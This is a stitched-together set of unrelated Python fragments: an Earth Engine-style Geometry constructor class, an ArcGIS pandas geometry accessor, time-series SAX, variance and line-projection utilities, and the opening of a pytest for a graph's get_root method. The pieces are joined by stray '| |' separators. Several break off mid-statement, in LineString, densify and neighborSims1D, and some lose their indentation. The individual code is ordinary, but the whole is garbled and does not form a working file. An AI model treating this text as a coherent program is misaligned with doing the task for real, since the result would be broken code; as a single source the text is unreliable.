  # The coordinates of the geometry, up to 4 nested levels with numbers at
  # the last level. None iff type is GeometryCollection.
  self._coordinates = geo_json.get('coordinates')
  # The subgeometries, None unless type is GeometryCollection.
  self._geometries = geo_json.get('geometries')
  # The projection code (WKT or identifier) of the geometry.
  if opt_proj:
    self._proj = opt_proj
  elif 'crs' in geo_json:
    # Only named CRSs are allowed; anything else is rejected as "linked".
    if (isinstance(geo_json.get('crs'), dict) and
        geo_json['crs'].get('type') == 'name' and
        isinstance(geo_json['crs'].get('properties'), dict) and
        isinstance(geo_json['crs']['properties'].get('name'), basestring)):
      self._proj = geo_json['crs']['properties']['name']
    else:
      raise ee_exception.EEException('Invalid CRS declaration in GeoJSON: ' +
                                     json.dumps(geo_json['crs']))
  else:
    self._proj = None
  # Whether the geometry has spherical geodesic edges.
  self._geodesic = opt_geodesic
  if opt_geodesic is None and 'geodesic' in geo_json:
    self._geodesic = bool(geo_json['geodesic'])
  # Whether polygon interiors use the even/odd rule.
  self._evenOdd = opt_evenOdd
  if opt_evenOdd is None and 'evenOdd' in geo_json:
    self._evenOdd = bool(geo_json['evenOdd'])
@classmethod
def initialize(cls):
  """Imports API functions to this class (idempotent)."""
  if cls._initialized:
    return
  apifunction.ApiFunction.importApi(cls, 'Geometry', 'Geometry')
  cls._initialized = True
@classmethod
def reset(cls):
  """Removes the Geometry API functions imported by initialize()."""
  cls._initialized = False
  apifunction.ApiFunction.clearApi(cls)
def __getitem__(self, key):
  """Allows access to GeoJSON properties for backward-compatibility."""
  geo_json = self.toGeoJSON()
  return geo_json[key]
@staticmethod
def Point(coords=_UNSPECIFIED, proj=_UNSPECIFIED, *args, **kwargs):
  """Constructs an ee.Geometry describing a point.

  Args:
    coords: A list of two [x,y] coordinates in the given projection.
    proj: The projection of this geometry, or EPSG:4326 if unspecified.
    *args: Varargs form for all-numeric calls, e.g.
        ee.Geometry.Point(lng, lat).
    **kwargs: Accepts "lon" and "lat" for backward-compatibility.

  Returns:
    An ee.Geometry describing a point.
  """
  all_args = Geometry._GetSpecifiedArgs(
      (coords, proj) + args, ('lon', 'lat'), **kwargs)
  init = Geometry._parseArgs('Point', 1, all_args)
  if not isinstance(init, computedobject.ComputedObject):
    # Literal case: validate that we got exactly one [x, y] pair.
    xy = init['coordinates']
    if not isinstance(xy, (list, tuple)) or len(xy) != 2:
      raise ee_exception.EEException(
          'The Geometry.Point constructor requires 2 coordinates.')
  return Geometry(init)
@staticmethod
def MultiPoint(coords=_UNSPECIFIED, proj=_UNSPECIFIED, *args):
  """Constructs an ee.Geometry describing a MultiPoint.

  Args:
    coords: A list of points, each in the GeoJSON 'coordinates' format of
        a Point, or a list of the x,y coordinates in the given projection,
        or an ee.Geometry describing a point.
    proj: The projection of this geometry. Defaults to the projection of
        the input ee.Geometry, or EPSG:4326 if there are none.
    *args: Varargs form for all-numeric calls with an even number of
        arguments, e.g. ee.Geometry.MultiPoint(aLng, aLat, bLng, bLat).

  Returns:
    An ee.Geometry describing a MultiPoint.
  """
  specified = Geometry._GetSpecifiedArgs((coords, proj) + args)
  parsed = Geometry._parseArgs('MultiPoint', 2, specified)
  return Geometry(parsed)
@staticmethod
def Rectangle(coords=_UNSPECIFIED, proj=_UNSPECIFIED,
              geodesic=_UNSPECIFIED, maxError=_UNSPECIFIED,
              evenOdd=_UNSPECIFIED, *args, **kwargs):
  """Constructs an ee.Geometry describing a rectangular polygon.

  Args:
    coords: The minimum and maximum corners of the rectangle, as a list
        of two GeoJSON 'Point' coordinate pairs, a list of two point
        ee.Geometry objects, or four numbers (xMin, yMin, xMax, yMax).
    proj: The projection of this geometry. Defaults to the projection of
        the input ee.Geometry, or EPSG:4326 if there are none.
    geodesic: If false, edges are straight in the projection; if true,
        they follow the shortest path on the Earth's surface. Defaults to
        the geodesic state of the inputs, or true for numeric inputs.
    maxError: Max error when the geometry must be reprojected to an
        explicitly requested result projection or geodesic state.
    evenOdd: If true, interiors use the even/odd rule; otherwise the
        left-inside rule. Defaults to True.
    *args: Varargs form for exactly four numbers, e.g.
        ee.Geometry.Rectangle(minLng, minLat, maxLng, maxLat).
    **kwargs: Accepts "xlo", "ylo", "xhi" and "yhi" for
        backward-compatibility.

  Returns:
    An ee.Geometry describing a rectangular polygon.
  """
  all_args = Geometry._GetSpecifiedArgs(
      (coords, proj, geodesic, maxError, evenOdd) + args,
      ('xlo', 'ylo', 'xhi', 'yhi'), **kwargs)
  init = Geometry._parseArgs('Rectangle', 2, all_args)
  if not isinstance(init, computedobject.ComputedObject):
    # GeoJSON has no Rectangle type, so expand the two corners into a
    # Polygon ring.
    xy = init['coordinates']
    if not isinstance(xy, (list, tuple)) or len(xy) != 2:
      raise ee_exception.EEException(
          'The Geometry.Rectangle constructor requires 2 points or 4 '
          'coordinates.')
    (x1, y1), (x2, y2) = (xy[0][0], xy[0][1]), (xy[1][0], xy[1][1])
    init['coordinates'] = [[[x1, y2], [x1, y1], [x2, y1], [x2, y2]]]
    init['type'] = 'Polygon'
  return Geometry(init)
@staticmethod
def LineString(coords=_UNSPECIFIED, proj=_UNSPECIFIED,
geodesic=_UNSPECIFIED, maxError=_UNSPECIFIED,
*args):
"""Constructs an ee.Geometry describing a LineString.
Args:
coords: A list of at least two points. May be a list of coordinates in
the GeoJSON 'LineString' format, a list of at least two ee.Geometry
describing a point, or a list of at least four numbers defining the
[x,y] coordinates of at least two points.
proj: The projection of this geometry. If unspecified, the default is the
projection of the input ee.Geometry, or EPSG:4326 if there are no
ee.Geometry inputs.
geodesic: If false, edges are straight in the projection. If true, edges
are curved to follow the shortest path on the surface of the Earth.
The default is the geodesic state of the inputs, or true if the
inputs are numbers.
maxError: Max error when input geometry must be reprojected to an
explicitly requested result projection or geodesic state.
*args: For convenience, varargs may be used when all arguments are
numbers. This allows creating geodesic EPSG:4326 LineStrings given
an even number of arguments, e.g.
ee.Geometry.LineString(aLng, aLat, bLng, bLat, ...).
Returns:
An ee.Geometry describing a LineString.
"""
all_args = Geometry._GetSpecifiedArgs(
(coords, proj, geodesic, maxError) + args)
return Geometry(Geometry._parseArgs('LineString', | |
"""
Holds Delegate and Accessor Logic
"""
import os
import copy
import uuid
import shutil
import datetime
import tempfile
import pandas as pd
import numpy as np
from ._internals import register_dataframe_accessor, register_series_accessor
from ._array import GeoType
from ._io.fileops import to_featureclass, from_featureclass
from arcgis.geometry import Geometry, SpatialReference, Envelope, Point
############################################################################
def _is_geoenabled(df):
"""
Checks if a Panda's DataFrame is 'geo-enabled'.
This means that a spatial column is defined and is a GeoArray
:returns: boolean
"""
try:
if isinstance(df, pd.DataFrame) and \
hasattr(df, 'spatial') and \
df.spatial.name and \
df[df.spatial.name].dtype.name.lower() == 'geometry':
return True
else:
return False
except:
return False
###########################################################################
@pd.api.extensions.register_series_accessor("geom")
class GeoSeriesAccessor:
"""
"""
_data = None
_index = None
_name = None
#----------------------------------------------------------------------
def __init__(self, series):
    """Initialize the accessor from a geometry-typed pandas Series."""
    self._validate(series)
    # Cache the raw array plus the index/name needed to rebuild Series.
    self._data = series.values
    self._index = series.index
    self._name = series.name
#----------------------------------------------------------------------
@staticmethod
def _validate(obj):
    """Raise AttributeError unless *obj* holds geometry-typed data."""
    if is_geometry_type(obj):
        return
    raise AttributeError("Cannot use 'geom' accessor on objects of "
                         "dtype '{}'.".format(obj.dtype))
##---------------------------------------------------------------------
## Accessor Properties
##---------------------------------------------------------------------
@property
def area(self):
    """
    Feature areas, re-indexed to match the parent Series.

    :returns: Series of float
    """
    out = self._data.area
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def as_arcpy(self):
    """
    Features converted to ArcPy geometry, re-indexed to the parent Series.

    :returns: Series of arcpy.Geometry
    """
    out = self._data.as_arcpy
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def as_shapely(self):
    """
    Features converted to Shapely geometry, re-indexed to the parent Series.

    :returns: Series of shapely.Geometry
    """
    out = self._data.as_shapely
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def centroid(self):
    """
    Feature centroids, re-indexed to the parent Series.

    :returns: Series of (x, y) tuples
    """
    out = self._data.centroid
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def extent(self):
    """
    Feature extents, re-indexed to the parent Series.

    :returns: Series of (xmin, ymin, xmax, ymax) tuples
    """
    out = self._data.extent
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def first_point(self):
    """
    The first point of each feature, re-indexed to the parent Series.

    :returns: Series of Geometry
    """
    out = self._data.first_point
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def geoextent(self):
    """
    The geometry's extents, re-indexed to the parent Series.

    :returns: Series of floats
    """
    out = self._data.geoextent
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def geometry_type(self):
    """
    The geometry type of each feature, re-indexed to the parent Series.

    :returns: Series of strings
    """
    out = self._data.geometry_type
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def hull_rectangle(self):
    """
    Space-delimited coordinate pairs of each feature's convex hull,
    re-indexed to the parent Series.

    :returns: Series of strings
    """
    out = self._data.hull_rectangle
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def is_empty(self):
    """
    Whether each feature is empty, re-indexed to the parent Series.

    :returns: Series of booleans
    """
    out = self._data.is_empty
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def is_multipart(self):
    """
    Whether each feature has multiple parts, re-indexed to the parent
    Series.

    :returns: Series of booleans
    """
    out = self._data.is_multipart
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def is_valid(self):
    """
    Whether each feature's geometry is valid, re-indexed to the parent
    Series.

    :returns: Series of booleans
    """
    out = self._data.is_valid
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def JSON(self):
    """
    JSON string of each geometry, re-indexed to the parent Series.

    :returns: Series of strings
    """
    out = self._data.JSON
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def label_point(self):
    """
    The optimal label-location point of each feature, re-indexed to the
    parent Series.

    :returns: Series of Geometry
    """
    out = self._data.label_point
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def last_point(self):
    """
    The last point of each feature, re-indexed to the parent Series.

    :returns: Series of Geometry
    """
    out = self._data.last_point
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def length(self):
    """
    The length of each feature, re-indexed to the parent Series.

    :returns: Series of float
    """
    out = self._data.length
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def length3D(self):
    """
    The 3D length of each feature, re-indexed to the parent Series.

    :returns: Series of float
    """
    out = self._data.length3D
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def part_count(self):
    """
    The number of parts in each feature's geometry, re-indexed to the
    parent Series.

    :returns: Series of integers
    """
    out = self._data.part_count
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def point_count(self):
    """
    The number of points in each feature's geometry, re-indexed to the
    parent Series.

    :returns: Series of integers
    """
    out = self._data.point_count
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def spatial_reference(self):
    """
    The spatial reference of each geometry, re-indexed to the parent
    Series.

    :returns: Series of SpatialReference
    """
    out = self._data.spatial_reference
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def true_centroid(self):
    """
    The true centroid of each geometry, re-indexed to the parent Series.

    :returns: Series of Points
    """
    out = self._data.true_centroid
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def WKB(self):
    """
    Each geometry as well-known binary, re-indexed to the parent Series.

    :returns: Series of bytes
    """
    out = self._data.WKB
    out.index = self._index
    return out
#----------------------------------------------------------------------
@property
def WKT(self):
    """
    Each geometry as well-known text, re-indexed to the parent Series.

    :returns: Series of strings
    """
    out = self._data.WKT
    out.index = self._index
    return out
##---------------------------------------------------------------------
## Accessor Geometry Method
##---------------------------------------------------------------------
def angle_distance_to(self, second_geometry, method="GEODESIC"):
    """
    Returns the angle and distance to another point using a measurement
    type, re-indexed to the parent Series.

    :param second_geometry: Required Geometry. An arcgis.Geometry object.
    :param method: Optional String. PLANAR measures in the projected 2D
        plane (ignoring the earth's curvature); GEODESIC, GREAT_ELLIPTIC,
        LOXODROME and PRESERVE_SHAPE are the curved alternatives.
    :returns: Series of (angle, distance) tuples
    """
    out = self._data.angle_distance_to(second_geometry=second_geometry,
                                       method=method)
    out.index = self._index
    return out
#----------------------------------------------------------------------
def boundary(self):
    """
    Constructs the boundary of each geometry, re-indexed to the parent
    Series.

    :returns: Series of arcgis.geometry.Polyline
    """
    out = self._data.boundary()
    out.index = self._index
    return out
#----------------------------------------------------------------------
def buffer(self, distance):
    """
    Constructs a polygon at a specified distance from each geometry,
    re-indexed to the parent Series.

    :param distance: Required float. Buffer distance, in the units of the
        geometry being buffered. A negative distance is only valid for
        polygon geometries.
    :returns: Series of arcgis.geometry.Polygon
    """
    out = self._data.buffer(distance=distance)
    out.index = self._index
    return out
#----------------------------------------------------------------------
def clip(self, envelope):
    """
    Constructs the intersection of each geometry and the given extent,
    re-indexed to the parent Series.

    :param envelope: Required tuple (XMin, YMin, XMax, YMax) giving the
        lower-left and upper-right bounds of the clipping extent.
    :returns: Series of clipped geometries
    """
    out = self._data.clip(envelope=envelope)
    out.index = self._index
    return out
#----------------------------------------------------------------------
def contains(self, second_geometry, relation=None):
    """
    Indicates whether each base geometry contains the comparison
    geometry, re-indexed to the parent Series.

    :param second_geometry: Required arcgis.geometry.Geometry.
    :param relation: Optional string spatial-relationship type:
        BOUNDARY (no restrictions on interiors/boundaries),
        CLEMENTINI (interiors must intersect; same as None, the default),
        or PROPER (boundaries must not intersect).
    :returns: Series of booleans
    """
    out = self._data.contains(second_geometry=second_geometry,
                              relation=relation)
    out.index = self._index
    return out
#----------------------------------------------------------------------
def convex_hull(self):
    """
    Constructs the minimal bounding polygon with all outer angles convex,
    re-indexed to the parent Series.

    :returns: Series of geometries
    """
    out = self._data.convex_hull()
    out.index = self._index
    return out
#----------------------------------------------------------------------
def crosses(self, second_geometry):
    """
    Indicates whether the two geometries intersect in a geometry of a
    lesser shape type, re-indexed to the parent Series.

    :param second_geometry: Required arcgis.geometry.Geometry.
    :returns: Series of booleans
    """
    out = self._data.crosses(second_geometry=second_geometry)
    out.index = self._index
    return out
#----------------------------------------------------------------------
def cut(self, cutter):
    """
    Splits each geometry into a part left of the cutting polyline and a
    part right of it, re-indexed to the parent Series.

    :param cutter: Required Polyline. The cutting polyline geometry.
    :returns: Series of two-geometry lists
    """
    out = self._data.cut(cutter=cutter)
    out.index = self._index
    return out
#----------------------------------------------------------------------
def densify(self, method, distance, deviation):
"""
Creates a new geometry with added vertices
=============== ====================================================================
**Argument** **Description**
--------------- --------------------------------------------------------------------
method Required String. The type of densification, DISTANCE, ANGLE, or GEODESIC
--------------- --------------------------------------------------------------------
distance Required float. The maximum distance between vertices. The actual
distance between vertices will usually be less than the maximum
distance as new vertices will be evenly distributed along the
original segment. If using a type of DISTANCE or ANGLE, the
distance is measured in the units of the geometry's spatial
reference. If using a type of GEODESIC, the distance is measured
in | |
= numSubseqs
numOutputCols = wordLen
return applyToEachCol(saxify1D, X, numOutputRows, numOutputCols,
length, wordLen, cardinality)
# ------------------------ sparse sax words
def sparseSaxify1D(seq, length, wordLen, cardinality):
    """SAX-encode one sequence, then one-hot (sparsify) the symbols."""
    saxWords = saxify1D(seq, length, wordLen, cardinality)
    return sparsifySaxWords(saxWords, cardinality)
def sparseSaxify(X, length, wordLen, cardinality):
    """Column-wise sparse SAX encoding of all length-long subsequences."""
    numOutputRows = len(X) - length + 1
    # One one-hot group of `cardinality` columns per SAX symbol.
    numOutputCols = wordLen * cardinality
    return applyToEachCol(sparseSaxify1D, X, numOutputRows, numOutputCols,
                          length, wordLen, cardinality)
# ------------------------ sax hashes
def sparseSaxHash1D(seq, length, wordLen, cardinality, noZeroCols=True):
    """SAX-encode one sequence and hash each word into a sparse code."""
    words = saxify1D(seq, length, wordLen, cardinality)
    return sparseSaxHashes(words, cardinality, noZeroCols=noZeroCols)
def sparseSaxHashify(X, length, wordLen, cardinality):
    """Column-wise sparse SAX-hash encoding of all subsequences of X."""
    numOutputRows = len(X) - length + 1
    # One output column per possible SAX word.
    numOutputCols = cardinality ** wordLen
    return applyToEachCol(sparseSaxHash1D, X, numOutputRows, numOutputCols,
                          length, wordLen, cardinality, noZeroCols=False)
# ------------------------------------------------ Variance
def runningVariance1D(seq):
    """Cumulative (population) variance of seq[:i+1] at every position i."""
    monitor = RunningVariance()
    out = np.empty(len(seq))
    for i, x in enumerate(seq):
        monitor.update(x)
        out[i] = monitor.SSE / (i + 1)
    return out
def slidingVariance1D(seq, length):
    """Variance of every length-long sliding window of seq.

    Returns an array of len(seq) - length + 1 window variances,
    maintained incrementally by a SlidingVariance monitor (O(n) total).
    """
    n = len(seq)
    numSubseqs = n - length + 1
    out = np.empty(numSubseqs)
    monitor = SlidingVariance()
    # monitor = SlidingVariance2()
    monitor.initialize(seq[:length])
    out[0] = monitor.variance
    for i in range(length, n):
        # Slide the window one step: drop oldX, add newX.
        oldX, newX = seq[i - length], seq[i]
        monitor.update(oldX, newX)
        # monitor.update(seq[i])
        # out[i - length + 1] = monitor.SSE
        out[i - length + 1] = monitor.variance
    # return out / length
    return out
def slidingVariance(X, length):
    """Apply slidingVariance1D to each column of X (one output column)."""
    numOutputRows = len(X) - length + 1
    return applyToEachCol(slidingVariance1D, X, numOutputRows, 1, length)
def sparseVariance(X, length, breakpoints=None):
    """One-hot encoding of the quantized sliding variance of each column.

    Variances are scaled so the maximum is 1, z-normalized column-wise,
    digitized against `breakpoints`, and one-hot encoded.
    """
    if breakpoints is None:
        # 7 evenly spaced breakpoints in (0, 1) -> 8 quantization levels
        breakpoints = np.linspace(0., 1., 9)[1:-1]
    # variance of each sliding window position, one row per input column
    variance = slidingVariance(X, length).T
    variance /= np.max(variance)  # set max variance to 1 for quantization
    variance = ar.zNormalizeCols(variance)
    # quantize and one-hot-encode the variances
    quantized = quantize(variance, breakpoints)
    cardinality = len(breakpoints) + 1
    return applyToEachCol(oneHotCodeFromIndices, quantized, len(quantized),
                          cardinality, cardinality=cardinality)
# ------------------------------------------------ Normalization
def slidingNormalize1D(seq, length, whichPoint='middle'):
    """Normalize one point of each sliding window of `seq` using that
    window's statistics (via a SlidingNormalizer monitor).

    `whichPoint` selects which point of each window gets normalized:
    'first', 'last', or anything else for the middle point (the default).
    Returns one value per window position, i.e. len(seq) - length + 1 values.
    """
    n = len(seq)
    numSubseqs = n - length + 1
    out = np.empty(numSubseqs)
    monitor = SlidingNormalizer()
    monitor.initialize(seq[:length])
    if whichPoint == 'first':  # normalize first point in window
        out[0] = monitor.normalize(seq[0])
        for i in range(length, n):
            oldX, newX = seq[i - length], seq[i]
            monitor.update(oldX, newX)
            out[i - length + 1] = monitor.normalize(seq[i - length + 1])
    elif whichPoint == 'last':  # normalize last point in window
        # NOTE(review): seq[0] is the *first* point of the first window;
        # for consistency with the loop below (which normalizes seq[i],
        # the last point) this looks like it should be seq[length - 1] --
        # confirm intent.
        out[0] = monitor.normalize(seq[0])
        for i in range(length, n):
            oldX, newX = seq[i - length], seq[i]
            monitor.update(oldX, newX)
            out[i - length + 1] = monitor.normalize(seq[i])
    else:  # normalize middle point in window
        halfLen = int(length/2)
        # NOTE(review): for the first window [0, length) the middle point
        # is seq[halfLen]; seq[length - halfLen] matches the loop's
        # seq[i - halfLen] pattern only for even `length` -- confirm the
        # off-by-one for odd window lengths.
        out[0] = monitor.normalize(seq[length - halfLen])
        for i in range(length, n):
            oldX, newX = seq[i - length], seq[i]
            monitor.update(oldX, newX)
            out[i - length + 1] = monitor.normalize(seq[i - halfLen])
    return out
def slidingNormalize(X, length):
    """Column-wise sliding normalization (middle point of each window)."""
    nRows = len(X) - length + 1
    return applyToEachCol(slidingNormalize1D, X, nRows, 1, length)
# ------------------------------------------------ Quantization
def quantize(X, breakpoints):
    """Map each value of X to the index of the quantization bin it falls in.

    For a 1D array this is exactly ``np.digitize(X, breakpoints)``. For a
    2D array each row is digitized independently and an integer array of
    the same shape is returned.

    Bug fix: the previous implementation cast X to an integer array
    *before* digitizing the rows, so fractional values were truncated and
    binned incorrectly -- inconsistent with the 1D path, which digitizes
    the raw values. It also used ``np.int``, which was removed in
    NumPy 1.24; the output dtype is now ``np.intp``.
    """
    if len(X.shape) == 1:
        return np.digitize(X, breakpoints)
    out = np.empty(X.shape, dtype=np.intp)
    for i, row in enumerate(X):
        out[i] = np.digitize(row, breakpoints)
    return out
def normalizeAndSparseQuantize1D(X, length, breakpoints=None):
    """Sliding-normalize X, quantize it, and one-hot encode the bins.

    When no breakpoints are given, the normalized values are rescaled to
    [0, 1] and 7 evenly spaced breakpoints (8 levels) are used.
    """
    normed = slidingNormalize1D(X, length)
    if breakpoints is None:
        normed = ar.zeroOneScaleMat(normed)
        breakpoints = np.linspace(0, 1, 9)[1:-1]  # 8 levels
    bins = quantize(normed, breakpoints)
    return oneHotCodeFromIndices(bins, len(breakpoints) + 1)
def normalizeAndSparseQuantize(X, length, breakpoints=None):
    """Column-wise version of normalizeAndSparseQuantize1D."""
    nRows = len(X) - length + 1
    # 8 is the default level count used by the 1D version
    nCols = 8 if breakpoints is None else len(breakpoints) + 1
    return applyToEachCol(normalizeAndSparseQuantize1D, X,
                          nRows, nCols, length, breakpoints)
# ------------------------------------------------ Line
# @jit
def lineProjection1D(seq, length):
    """Project every sliding window of `seq` onto a straight line.

    Returns two arrays (correlations, slopes), one entry per window
    position, computed incrementally via SlidingStraightLineProjection.
    """
    n = len(seq)
    numWindows = n - length + 1
    corrs = np.empty(numWindows)
    slps = np.empty(numWindows)
    proj = SlidingStraightLineProjection()
    proj.initialize(seq[:length])
    corrs[0], slps[0] = proj.r, proj.slope
    for end in range(length, n):
        proj.update(seq[end - length], seq[end])
        pos = end - length + 1
        corrs[pos], slps[pos] = proj.r, proj.slope
    return corrs, slps
# @jit
# def lineProject(X, length):
# numSubseqs = len(X) - length + 1
# numOutputRows = numSubseqs
# numOutputCols = 1
# return applyToEachCol(lineProjection1D, X, numOutputRows, numOutputCols, length)
def sparseLineProjection1D(seq, length, breakpoints, maxFilter=False, ignoreFlat=False):
    """Sparse-encode, per sliding window, how well a straight line of a
    given (quantized, signed) slope explains the window.

    Each output row has ``2 * len(breakpoints) + 1`` columns: negative
    slope bins, a central "flat" bin, positive slope bins. The active
    column holds |correlation| of the window with its best-fit line.

    Bug fix: ``np.int`` was removed in NumPy 1.24; use ``np.intp``.
    """
    corrs, slopes = lineProjection1D(seq, length)
    increases = slopes * length  # total rise over one window
    numSubseqs = len(corrs)
    numBreakpoints = len(breakpoints)
    cardinality = 2 * numBreakpoints + 1
    # digitize the magnitude, then restore the sign and shift so that
    # index `numBreakpoints` means "flat"
    signs = 2 * (corrs >= 0) - 1
    indices = np.digitize(increases * signs, breakpoints) * signs + numBreakpoints
    out = np.zeros((numSubseqs, cardinality))
    # if maxFilter is true, we use the indices associated with whichever point
    # best explains this time step at this length, as measured by |correlation|
    if maxFilter:
        maxIdxs = ar.slidingMaximaIdxs(np.abs(corrs), length // 2, pastEnd=True)
        indices = indices[maxIdxs]
    allRowsIdxs = np.arange(numSubseqs, dtype=np.intp)
    if ignoreFlat:
        # drop windows whose quantized slope landed in the central bin
        zeroIdx = numBreakpoints
        whereNotFlat = np.where(indices != zeroIdx)[0]
        allRowsIdxs = allRowsIdxs[whereNotFlat]
        indices = indices[whereNotFlat]
        corrs = corrs[whereNotFlat]
    out[allRowsIdxs, indices] = np.abs(corrs)
    return out
def sparseLineProject(X, length, breakpoints, **kwargs):
    """Column-wise sparseLineProjection1D (same breakpoints for every dim)."""
    # TODO allow different breakpoints across dims
    nRows = len(X) - length + 1
    nCols = 2 * len(breakpoints) + 1
    return applyToEachCol(sparseLineProjection1D, X, nRows, nCols,
                          length, breakpoints, **kwargs)
def defaultSparseLineBreakpoints(X, scaleHowMany=1, cardinality=8, logScale=False):
    """Default slope breakpoints spanning the largest per-column value
    range of X.

    Linear mode (default): ``cardinality - 1`` evenly spaced breakpoints in
    (0, valRange). Log mode: log2-spaced breakpoints from valRange/100 up
    to valRange, one per octave (times `scaleHowMany`).
    """
    minVals, maxVals = np.min(X, axis=0), np.max(X, axis=0)
    valRange = np.max(maxVals - minVals)  # biggest range of any dimension
    if not logScale:
        return np.linspace(0, valRange, cardinality+1)[1:-1]  # 7 breakpoints -> 8 levels
    minVariance = valRange / 100.
    numBreakpoints = int(np.ceil(np.log2(valRange) - np.log2(minVariance)))
    numBreakpoints *= scaleHowMany
    return np.logspace(np.log2(minVariance), np.log2(valRange),
                       num=numBreakpoints, base=2.)
# ------------------------------------------------ Neighbors
def randChoice(a, size=1, replace=True, p=None):
    """
    Wrapper for numpy random.choice that deals with zero probabilities (in p)
    """
    # no probabilities given -> plain uniform choice
    if p is None or not len(p):
        return np.random.choice(a, size, replace)
    # drop entries whose probability is zero before delegating to numpy
    keep = p > 0
    numKept = np.sum(keep)
    if numKept == 0 or (numKept < size and not replace):
        msg = ("randChoice(): fewer nonzero probabilities"
               "({}) than requested size ({})").format(numKept, size)
        raise ValueError(msg)
    p, a = p[keep], a[keep]
    size = min(size, len(a))
    return np.random.choice(a, size, replace, p)
def randIdxs(length, num, minSpacing=1, probabilities=None,
             reduceSpacingIfNeeded=False, reduceNumIfNeeded=False):
    """
    Returns `num` unique indices within ``[0, length)``; probabilities of selecting
    each index can be specified with `probabilities`, and a desired minimum
    spacing between indices (not guaranteed) can be specified with `minSpacing`.

    If `reduceSpacingIfNeeded` is True, minSpacing will be set to a smaller
    value when it is not possible to return `num` samples `minSpacing` indices
    apart. If `reduceNumIfNeeded` is True, `num` is instead reduced to the
    largest count that fits. Otherwise, a ValueError is raised when the
    request cannot be satisfied.
    """
    hasProbs = probabilities is not None and len(probabilities)
    if hasProbs and len(probabilities) != length:
        raise ValueError("Probabilities have length"
            "{} != requested length {}".format(len(probabilities), length))
    # convert fractional minSpacing and ensure that it's an int >= 1
    if 0. <= minSpacing < 1.:
        minSpacing *= length
    minSpacing = int(max(1, minSpacing))
    neededLength = (num - 1) * minSpacing + 1
    if neededLength > length:
        if reduceSpacingIfNeeded:
            minSpacing = int((length - 1) / (num - 1))
        elif reduceNumIfNeeded:
            # Bug fix: this used to be `neededLength // minSpacing + 1`,
            # which never shrank num (and grew it for minSpacing=1). The
            # most indices that fit in `length` with this spacing is:
            num = (length - 1) // minSpacing + 1
        else:
            raise ValueError("cannot return {} indices out of {} with minSpacing {}".format(
                num, length, minSpacing))
    # sum together the probabilities of every minSpacing adjacent points;
    # bug fix: only do this when probabilities were actually given --
    # np.append(None, ...) used to build an object array and crash
    probs = probabilities if hasProbs else None
    if minSpacing > 1 and hasProbs:
        remainder = length % minSpacing
        padLen = (minSpacing - remainder) % minSpacing  # mod in case remainder=0
        probsReshape = np.append(probs, np.zeros(padLen))
        probsReshape = probsReshape.reshape((-1, minSpacing))
        probs = np.sum(probsReshape, axis=1)
    # compute the (rough) idxs; we divide by minSpacing before deciding
    # and then multiply by minSpacing so that the points are at least
    # minSpacing apart
    allIdxs = np.arange(np.ceil(length / float(minSpacing)), dtype=np.intp)
    idxs = randChoice(allIdxs, num, replace=False, p=probs)
    # add an offset to each idx so that we don't always return multiples
    # of minSpacing
    probs = probabilities if hasProbs else np.ones(length) / length  # uniform
    if minSpacing > 1:
        idxs *= minSpacing
        allOffsetIdxs = np.arange(minSpacing)
        for i, idx in enumerate(idxs):
            # bug fix: normalize into a fresh array; `/=` on this slice
            # used to mutate the caller's probabilities array in place
            offsetProbs = probs[idx:idx+minSpacing]
            offsetProbs = offsetProbs / np.sum(offsetProbs)
            possibleIdxs = allOffsetIdxs[:len(offsetProbs)]  # edge case if near end
            offset = randChoice(possibleIdxs, replace=True, p=offsetProbs)
            idxs[i] += int(offset)
    return np.sort(idxs.astype(np.intp))  # TODO don't sort for speed
@jit
def pairwiseDists(X):
    """All-pairs squared euclidean distances between the rows of X, with
    the (i, j) upper-triangle entry divided by the variance of row i
    before mirroring to the lower triangle.

    The diagonal (self-distance) is overwritten with a large value
    (num columns * max row variance) so self-matches never win
    nearest-neighbor queries.
    """
    numSubseqs = len(X)
    allVariances = np.var(X, axis=1)
    allDists = np.zeros((numSubseqs, numSubseqs))
    for i in range(numSubseqs):
        variance = allVariances[i]
        for j in range(i+1, numSubseqs):
            diff = X[i] - X[j]
            allDists[i, j] = np.sum(diff * diff) / variance
    allDists += allDists.T  # mirror upper triangle; lower half was zero
    # ignore self-similarity.
    # Bug fix: this used `allDists[[diagIdxs, diagIdxs]]`, indexing with a
    # nested list, which NumPy deprecated (and later rejects); use a
    # proper tuple index for the diagonal instead.
    diagIdxs = np.arange(numSubseqs)
    allDists[diagIdxs, diagIdxs] = X.shape[1] * np.max(allVariances)
    return allDists
def neighborSims1D(seq, length, numNeighbors=100, samplingAlgo='walk',
similarityAlgo='meanOnly', maxDist=.25, localMaxFilter=False,
spacedMaxFilter=False, tryNumNeighbors=-1, **sink):
# spacedMaxFilter=True, tryNumNeighbors=-1, **sink):
# print "neighborSims1D(); seq shape, requested len, requested | |
children2_combined)) and \
np.all(np.isin(children22001, children2_combined))
@pytest.mark.timeout(30)
def test_get_root(self, gen_graph_simplequerytest):
    """All supervoxels of one connected component must share a root, the
    two components must map to the two distinct layer-4 roots (in either
    order, since root ID assignment order is not guaranteed), and an
    invalid node ID must raise."""
    cgraph = gen_graph_simplequerytest
    root10000 = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0),
                                time_stamp=None)
    root11000 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0),
                                time_stamp=None)
    root11001 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1),
                                time_stamp=None)
